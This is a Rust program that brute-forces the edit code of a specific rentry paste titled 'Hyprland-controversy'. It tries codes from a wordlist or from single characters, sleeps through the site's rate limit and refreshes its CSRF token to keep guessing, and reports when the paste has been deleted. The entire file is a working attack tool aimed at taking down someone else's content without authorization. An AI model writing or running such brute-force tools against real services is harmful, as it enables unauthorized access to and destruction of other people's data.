use crate::rentry::{build_client, edit_paste, CSRFData, EditError};

use std::{
    fs::File,
    io::{BufRead, BufReader},
};

mod rentry;

const PASTE_NAME: &str = "Hyprland-controversy";

pub struct EditCodeGenerator<I>
where
    I: Iterator<Item = String>,
{
    inner: I,
    last_item: Option<String>,
    retry: bool,
}

impl<I> EditCodeGenerator<I>
where
    I: Iterator<Item = String>,
{
    pub fn new(inner: I) -> Self {
        EditCodeGenerator {
            inner,
            last_item: None,
            retry: false,
        }
    }

    pub fn retry_last(&mut self) -> Option<()> {
        if let Some(ref _item) = self.last_item {
            self.retry = true;
            Some(())
        } else {
            None
        }
    }
}

impl EditCodeGenerator<std::vec::IntoIter<String>> {
    pub fn from_file(file_path: &str) -> Result<Self, std::io::Error> {
        let file = File::open(file_path)?;
        let reader = BufReader::new(file);
        let lines = reader.lines().collect::<Result<Vec<_>, _>>()?;
        Ok(EditCodeGenerator::new(lines.into_iter()))
    }
}

impl<I> Iterator for EditCodeGenerator<I>
where
    I: Iterator<Item = String>,
{
    type Item = String;

    fn next(&mut self) -> Option<Self::Item> {
        if self.retry {
            self.retry = false;
            return self.last_item.clone();
        }

        let next_item = self.inner.next();
        self.last_item = next_item.clone();
        next_item
    }
}

impl Default for EditCodeGenerator<std::vec::IntoIter<String>> {
    fn default() -> Self {
        let codes = (b'a'..=b'z')
            .map(|c| (c as char).to_string())
            .chain((b'A'..=b'Z').map(|c| (c as char).to_string()))
            .chain((b'0'..=b'9').map(|c| (c as char).to_string()))
            .collect::<Vec<_>>();

        EditCodeGenerator::new(codes.into_iter())
    }
}

fn main() {
    let client = build_client();
    let mut csrf_data = CSRFData::get(&client, PASTE_NAME);

    let mut edit_codes = EditCodeGenerator::from_file("test-list.txt").unwrap();
    //let mut edit_codes = EditCodeGenerator::default();

    while let Some(edit_code) = edit_codes.next() {
        match edit_paste(&client, &csrf_data, &edit_code, PASTE_NAME) {
            Ok(_) => {
                println!("Paste deleted successfully with edit code: {edit_code}");
                return;
            }
            Err(e) => match e {
                EditError::FormFieldError(msg) if msg == "Invalid edit code." => {
                    println!("Invalid edit code {edit_code}");
                }
                EditError::FormFieldError(msg) => {
                    eprintln!("Form error: {msg}");
                    return;
                }
                EditError::FormError(msg)
                    if msg == "You have hit the limit, please wait a bit. e345" =>
                {
                    println!("Hit the limit, waiting...");
                    csrf_data = CSRFData::get(&client, PASTE_NAME);
                    std::thread::sleep(std::time::Duration::from_secs(30));
                    edit_codes.retry_last().unwrap();
                }
                EditError::FormError(msg) => {
                    eprintln!("Form error: {msg}");
                    return;
                }
                EditError::RequestFailure(msg) => {
                    eprintln!("Request error (non 2XX): {msg}");
                    return;
                }
                EditError::UnexpectedRedirect(msg) => {
                    eprintln!("Unexpected redirect: {msg}");
                    return;
                }
                EditError::UnknownFailure(msg) => {
                    eprintln!("Unknown failure: {msg}");
                    return;
                }
                EditError::ReqwestError(e) => {
                    eprintln!("Request failed with: {e:?}");
                    return;
                }
            },
        }
    }
}
